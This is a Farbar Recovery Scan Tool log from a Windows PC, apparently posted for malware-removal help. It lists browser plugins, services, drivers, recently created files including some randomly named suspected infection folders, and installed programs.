BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)

BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)

BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

Toolbar: HKLM - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)

Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)




DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab

DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://juniper.net/dana-cached/sc/JuniperSetupClient.cab

Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll (Microsoft Corporation)

Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll (Microsoft Corporation)

Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl.dll (McAfee, Inc.)

Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

 

FireFox:

========

FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_152.dll ()

FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()

FF Plugin: @divx.com/DivX Browser Plugin,version=1.0.0 -> C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)

FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)

FF Plugin: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)

FF Plugin: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()

FF Plugin: @mcafee.com/MVT -> C:\Program Files\McAfee\Supportability\MVT\npmvtplugin.dll (McAfee, Inc.)

FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)

FF Plugin: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)

FF Plugin: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll (Nexon)

FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)

FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin: @videolan.org/vlc,version=2.1.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)

FF Plugin: @videolan.org/vlc,version=2.1.5 -> C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)

FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension

FF Extension: Microsoft .NET Framework Assistant - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-04-07]

FF HKLM\...\Firefox\Extensions: [{7BA52691-1876-45ce-9EE6-54BCB3B04BBC}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\coFFPlgn

FF HKLM\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5

FF Extension: DivX Plus Web Player HTML5 <video> - C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2013-02-23]

 

Chrome: 

=======

CHR HomePage: Default -> hxxp://www.google.com

CHR StartupUrls: Default -> "hxxp://www.google.com"

CHR DefaultSearchKeyword: Default -> search.live.com


CHR DefaultSuggestURL: Default -> 

CHR Profile: C:\Users\Tyler\AppData\Local\Google\Chrome\User Data\Default

CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Tyler\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-28]

CHR Extension: (YouTube) - C:\Users\Tyler\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-09-26]

CHR Extension: (Google Search) - C:\Users\Tyler\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-09-26]

CHR Extension: (Google Wallet) - C:\Users\Tyler\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]

CHR Extension: (Gmail) - C:\Users\Tyler\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-09-26]

CHR HKLM\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - C:\Program Files\DivX\DivX Plus Web Player\chrome\DivXHTML5\DivXHTML5.crx [2013-02-07]

 

========================== Services (Whitelisted) =================

 

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

 

S4 AESTFilters; C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_ae0b52e0\aestsrv.exe [81920 2008-12-14] (Andrea Electronics Corporation)

S4 asurscsi; C:\Users\Tyler\AppData\Local\Temp\MSI3834.tmp [142336 2009-10-21] (Voyetra Turtle Beach, Inc.) [File not signed]

S4 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [155648 2008-09-23] (Stardock Corporation) [File not signed]

S3 EvoSvc; C:\Program Files\Echobit\Evolve\EvoSvc.exe [1579936 2014-09-23] (Echobit LLC)

S4 GameConsoleService; C:\Program Files\WildTangent\Dell Games\Dell Game Console\GameConsoleService.exe [164600 2008-07-04] (WildTangent, Inc.)

S4 hnmsvc; c:\ProgramData\SingleClick Systems\Advanced Networking Service\hnm_svc.exe [820464 2008-09-30] (Dell Inc.)

R2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)

S4 lxec_device; C:\Windows\system32\lxeccoms.exe [598696 2010-04-14] ( )

R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)

R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)

R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [145568 2014-04-25] (McAfee, Inc.)

R2 McNaiAnn; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)

R3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [472072 2014-06-12] (McAfee, Inc.)

R2 mcpltsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)

R2 McProxy; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)

R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [655936 2014-07-24] (McAfee, Inc.)

R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [169800 2014-06-20] (McAfee, Inc.)

R2 mfevtp; C:\Windows\system32\mfevtps.exe [179600 2014-06-20] (McAfee, Inc.)

S4 sprtsvc_DellSupportCenter; C:\Program Files\Dell Support Center\bin\sprtsvc.exe [201968 2008-10-04] (SupportSoft, Inc.)

R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_ae0b52e0\STacSV.exe [241746 2008-12-14] (IDT, Inc.)

S4 UMVPFSrv; C:\Program Files\Common Files\logishrd\LVMVFM\UMVPFSrv.exe [450848 2012-01-18] (Logitech Inc.)

R2 yksvc; RUNDLL32.EXE ykx32coinst,serviceStartProc [X]

 

==================== Drivers (Whitelisted) ====================

 

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

 

S3 BCM42RLY; C:\Windows\System32\drivers\BCM42RLY.sys [18424 2008-12-22] (Broadcom Corporation)

S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [62832 2014-06-20] (McAfee, Inc.)

R3 EvolveVirtualAdapter; C:\Windows\System32\DRIVERS\evolve.sys [18584 2014-08-10] (Echobit, LLC)

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-10-01] (Malwarebytes Corporation)

R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-11-13] (Malwarebytes Corporation)

R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-10-01] (Malwarebytes Corporation)

R3 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [135968 2014-06-20] (McAfee, Inc.)

R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [238176 2014-06-20] (McAfee, Inc.)

S3 mfebopk; C:\Windows\System32\drivers\mfebopk.sys [67816 2014-06-20] (McAfee, Inc.)

R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [369248 2014-06-20] (McAfee, Inc.)

R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [576048 2014-06-20] (McAfee, Inc.)

R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [349192 2014-07-24] (McAfee, Inc.)

S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [81296 2014-07-24] (McAfee, Inc.)

R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [217224 2014-06-20] (McAfee, Inc.)

R2 Packet; C:\Windows\System32\DRIVERS\packet.sys [22016 2008-06-17] (SingleClick Systems)

S3 EagleNT; \??\C:\Windows\system32\drivers\EagleNT.sys [X]

S3 EagleXNt; \??\C:\Windows\system32\drivers\EagleXNt.sys [X]

S3 IpInIp; system32\DRIVERS\ipinip.sys [X]

S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]

S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-13 18:59 - 2014-11-13 19:00 - 00022240 _____ () C:\Users\Tyler\Downloads\FRST.txt

2014-11-13 18:58 - 2014-11-13 18:58 - 01108480 _____ (Farbar) C:\Users\Tyler\Desktop\FRST.exe

2014-11-13 18:53 - 2014-11-13 18:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee

2014-11-09 06:27 - 2014-11-09 06:27 - 00021241 _____ () C:\Users\Tyler\Desktop\virus removal logs.zip

2014-11-09 05:58 - 2014-11-13 18:59 - 00000000 ____D () C:\FRST

2014-11-09 05:54 - 2014-11-09 05:54 - 00003181 _____ () C:\Users\Tyler\Desktop\Malwarebytes Help Making a post.txt

2014-11-09 04:23 - 2014-11-09 04:23 - 00229927 _____ () C:\Users\Tyler\Desktop\Scan_2014-11-9-4-10.txt

2014-11-09 04:19 - 2014-11-13 18:46 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys

2014-11-09 04:17 - 2014-11-09 04:17 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk

2014-11-09 04:17 - 2014-11-09 04:17 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

2014-11-09 04:17 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys

2014-11-09 04:17 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys

2014-11-09 04:17 - 2014-10-01 11:11 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys

2014-11-09 04:16 - 2014-11-09 04:17 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware

2014-11-09 04:16 - 2014-11-09 04:16 - 00000000 ____D () C:\ProgramData\Malwarebytes

2014-11-09 03:27 - 2014-11-09 05:41 - 00000000 ____D () C:\Users\Tyler\AppData\Local\Igdsoft

2014-11-09 03:27 - 2014-11-09 03:27 - 00000000 ____D () C:\Users\Tyler\AppData\Local\Ewfdtion

2014-11-08 22:21 - 2014-11-08 22:21 - 00000000 ____D () C:\Program Files\Reason

2014-11-08 22:16 - 2014-11-08 22:17 - 02469552 _____ (Reason Company Software Inc.) C:\Users\Tyler\Desktop\herdProtectScan_Portable.exe

2014-11-08 22:07 - 2014-11-08 22:34 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Tyler\Desktop\mbam-setup-2.0.3.1025.exe

2014-11-08 22:05 - 2014-11-09 03:56 - 00000000 ____D () C:\ProgramData\HitmanPro

2014-11-08 21:59 - 2014-11-08 22:02 - 10284408 _____ (SurfRight B.V.) C:\Users\Tyler\Desktop\HitmanPro.exe

2014-11-08 21:49 - 2014-11-08 22:00 - 00000000 ____D () C:\Users\Tyler\AppData\Roaming\Nihyqyx

2014-11-08 21:45 - 2014-11-08 21:45 - 00000000 ____D () C:\ProgramData\PancUfizy

2014-11-08 20:35 - 2014-11-09 07:08 - 00000160 ____H () C:\ProgramData\@system3.att

2014-11-08 20:34 - 2014-11-09 07:08 - 00000424 _____ () C:\ProgramData\@system.temp

2014-11-08 20:34 - 2014-11-09 04:53 - 00000000 ____D () C:\Users\Tyler\AppData\Roaming\FrameworkUpdate7

2014-11-08 20:34 - 2014-11-08 20:34 - 00000448 ____H () C:\Users\Tyler\AppData\Roaming\麽鎒駓覜

2014-11-08 20:34 - 2014-11-08 20:34 - 00000000 ____D () C:\ProgramData\DufjiGmudi

2014-11-08 20:33 - 2014-11-09 03:36 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage

2014-10-24 20:32 - 2014-10-24 20:32 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk

2014-10-24 20:32 - 2014-10-24 20:32 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes

2014-10-24 20:29 - 2014-10-24 20:31 - 00000000 ____D () C:\ProgramData\B0FFCDD9-5261-4e59-B29A-17A4FABDEBAB

2014-10-24 20:29 - 2014-10-24 20:31 - 00000000 ____D () C:\Program Files\iTunes

2014-10-24 20:29 - 2014-10-24 20:29 - 00000000 ____D () C:\Program Files\iPod

2014-10-20 05:19 - 2014-11-09 06:24 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cfec4f46187060.job

2014-10-18 14:25 - 2014-11-09 06:30 - 00000908 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA1cfeb0948c7c370.job

2014-10-17 21:54 - 2014-10-17 21:54 - 00001878 _____ () C:\Users\Public\Desktop\Skype.lnk

2014-10-17 21:54 - 2014-10-17 21:54 - 00000000 ___RD () C:\Program Files\Skype

2014-10-17 21:54 - 2014-10-17 21:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype

2014-10-17 21:54 - 2014-10-17 21:54 - 00000000 ____D () C:\Program Files\Common Files\Skype

2014-10-17 02:13 - 2014-06-15 17:18 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll

2014-10-17 02:13 - 2014-06-13 13:22 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll

2014-10-17 02:13 - 2014-06-13 13:22 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll

2014-10-17 02:09 - 2014-09-27 18:29 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys

2014-10-17 02:07 - 2014-09-04 18:27 - 00143360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys

2014-10-17 02:02 - 2014-09-16 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll

2014-10-16 21:55 - 2014-10-16 21:55 - 00000000 ____D () C:\Program Files\SystemRequirementsLab

2014-10-16 21:54 - 2014-10-16 21:54 - 00663552 _____ () C:\Users\Tyler\Downloads\Detection.msi

2014-10-16 16:32 - 2014-10-16 16:32 - 00000000 ____D () C:\Program Files\Common Files\Java

2014-10-16 16:32 - 2014-10-16 16:30 - 00272808 _____ (Oracle Corporation) C:\Windows\system32\javaws.exe

2014-10-16 16:31 - 2014-10-16 16:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java

2014-10-16 16:31 - 2014-10-16 16:30 - 00175528 _____ (Oracle Corporation) C:\Windows\system32\javaw.exe

2014-10-16 16:31 - 2014-10-16 16:30 - 00175528 _____ (Oracle Corporation) C:\Windows\system32\java.exe

2014-10-16 16:31 - 2014-10-16 16:30 - 00096680 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll

2014-10-16 05:26 - 2014-09-19 17:53 - 12364288 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll

2014-10-16 05:26 - 2014-09-19 17:44 - 01810432 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll

2014-10-16 05:26 - 2014-09-19 17:41 - 09739776 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll

2014-10-16 05:26 - 2014-09-19 17:39 - 01138688 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll

2014-10-16 05:26 - 2014-09-19 17:38 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll

2014-10-16 05:26 - 2014-09-19 17:37 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl

2014-10-16 05:26 - 2014-09-19 17:36 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll

2014-10-16 05:26 - 2014-09-19 17:36 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe

2014-10-16 05:26 - 2014-09-19 17:36 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll

2014-10-16 05:26 - 2014-09-19 17:35 - 01802752 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll

2014-10-16 05:26 - 2014-09-19 17:35 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll

2014-10-16 05:26 - 2014-09-19 17:35 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll

2014-10-16 05:26 - 2014-09-19 17:35 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll

2014-10-16 05:26 - 2014-09-19 17:35 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll

2014-10-16 05:26 - 2014-09-19 17:34 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb

2014-10-16 05:26 - 2014-09-19 17:34 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll

2014-10-16 05:26 - 2014-09-19 17:34 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll

2014-10-16 05:26 - 2014-09-19 17:34 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll

2014-10-16 05:26 - 2014-09-19 17:34 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe

2014-10-16 05:26 - 2014-09-19 17:34 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe

2014-10-16 05:26 - 2014-09-19 17:33 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-13 19:00 - 2012-04-18 17:41 - 00000000 ____D () C:\Users\Tyler\AppData\Local\PMB Files

2014-11-13 18:57 - 2009-03-15 15:57 - 01533365 _____ () C:\Windows\WindowsUpdate.log

2014-11-13 18:53 - 2014-01-08 10:11 - 00001753 _____ () C:\Users\Public\Desktop\McAfee AntiVirus.lnk

2014-11-13 18:51 - 2006-11-02 05:33 - 00759542 _____ () C:\Windows\system32\PerfStringBackup.INI

2014-11-13 18:49 - 2009-04-08 16:54 - 00000000 ____D () C:\Users\Tyler\Tracing

2014-11-13 18:46 - 2014-02-18 07:13 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore1cf2ca2e648d290.job

2014-11-13 18:44 - 2006-11-02 08:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT

2014-11-13 18:44 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0

2014-11-13 18:44 - 2006-11-02 07:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0

2014-11-09 15:52 - 2006-11-02 08:01 - 00032630 _____ () C:\Windows\Tasks\SCHEDLGU.TXT

2014-11-09 15:40 - 2008-01-20 21:47 - 01296150 _____ () C:\Windows\PFRO.log

2014-11-09 07:14 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\Web

2014-11-09 07:11 - 2011-08-14 22:50 - 00000000 ____D () C:\Users\Tyler\AppData\Roaming\Skype

2014-11-09 06:31 - 2010-01-13 20:36 - 00000680 _____ () C:\Users\Tyler\AppData\Local\d3d9caps.dat

2014-11-09 06:30 - 2012-09-26 16:12 - 00000908 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA.job

2014-11-09 06:24 - 2011-04-07 19:55 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job

2014-11-09 06:22 - 2012-04-13 04:03 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job

2014-11-09 04:01 - 2012-01-15 01:41 - 00000000 ____D () C:\Users\Tyler\AppData\Local\CrashDumps

2014-11-09 03:40 - 2011-08-14 20:42 - 00000000 ____D () C:\ProgramData\Anti-phishing Domain Advisor

2014-11-08 19:31 - 2012-09-26 16:12 - 00000856 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000Core.job

2014-10-27 14:27 - 2012-09-26 16:14 - 00002044 _____ () C:\Users\Tyler\Desktop\Google Chrome.lnk

2014-10-24 20:29 - 2014-10-03 21:57 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1

2014-10-24 20:29 - 2014-01-24 20:59 - 00000000 ____D () C:\Program Files\Common Files\Apple

2014-10-17 21:54 - 2011-08-14 22:50 - 00000000 ____D () C:\ProgramData\Skype

2014-10-17 02:51 - 2006-11-02 06:18 - 00000000 ____D () C:\Windows\Microsoft.NET

2014-10-17 02:35 - 2006-11-02 07:47 - 03627952 _____ () C:\Windows\system32\FNTCACHE.DAT

2014-10-17 02:13 - 2009-04-14 16:07 - 00000000 ____D () C:\ProgramData\Microsoft Help

2014-10-16 22:08 - 2011-08-19 18:11 - 00000000 ____D () C:\Program Files\Steam

2014-10-16 16:33 - 2013-10-21 21:40 - 00000000 ____D () C:\ProgramData\Oracle

2014-10-16 05:20 - 2012-08-26 03:10 - 00000858 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\LINE.lnk

2014-10-16 05:20 - 2012-08-26 03:10 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LINE

Files to move or delete:

====================

C:\ProgramData\hash.dat

Some content of TEMP:

====================

C:\Users\Tyler\AppData\Local\Temp\DivXSetup.exe

C:\Users\Tyler\AppData\Local\Temp\install_flashplayer11x32ax_gtbp_chrd_au_aih.exe

C:\Users\Tyler\AppData\Local\Temp\jre-6u31-windows-i586-iftw-rv.exe

C:\Users\Tyler\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-6u39-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u21-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u55-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u60-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe

C:\Users\Tyler\AppData\Local\Temp\NGMDll.dll

C:\Users\Tyler\AppData\Local\Temp\NGMResource.dll

C:\Users\Tyler\AppData\Local\Temp\NGMSetup.exe

C:\Users\Tyler\AppData\Local\Temp\SkypeSetup.exe

C:\Users\Tyler\AppData\Local\Temp\swt-win32-3349.dll

C:\Users\Tyler\AppData\Local\Temp\tmp17EA.exe

C:\Users\Tyler\AppData\Local\Temp\tmpE2E6.exe

C:\Users\Tyler\AppData\Local\Temp\unicows.dll

C:\Users\Tyler\AppData\Local\Temp\UpdateFlashPlayer_8459c5d2.exe

C:\Users\Tyler\AppData\Local\Temp\vlc-2.1.5-win32.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-11-13 18:55

==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 13-11-2014 01

Ran by Tyler at 2014-11-13 19:01:02

Running from C:\Users\Tyler\Downloads

Boot Mode: Normal

==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}

AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {16C7C823-5972-5907-58FA-0004E2F9422F}

AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Ace of Spades (HKLM\...\Steam App 224540) (Version:  - Jagex Limited)

Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1.377 - Adobe Systems Incorporated)

Acrobat.com (Version: 0.0.0 - Adobe Systems Incorporated) Hidden

Adobe AIR (HKLM\...\Adobe AIR) (Version: 2.7.1.19610 - Adobe Systems Incorporated)

Adobe Community Help (HKLM\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.0.0.400 - Adobe Systems Incorporated)

Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)

Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)

Adobe Media Player (HKLM\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated)

Adobe Reader 9.5.5 (HKLM\...\{AC76BA86-7AD7-1033-7B44-A95000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)

Apple Application Support (HKLM\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{235EBB33-3DA1-46DF-AADE-9955123409CB}) (Version: 8.0.5.6 - Apple Inc.)

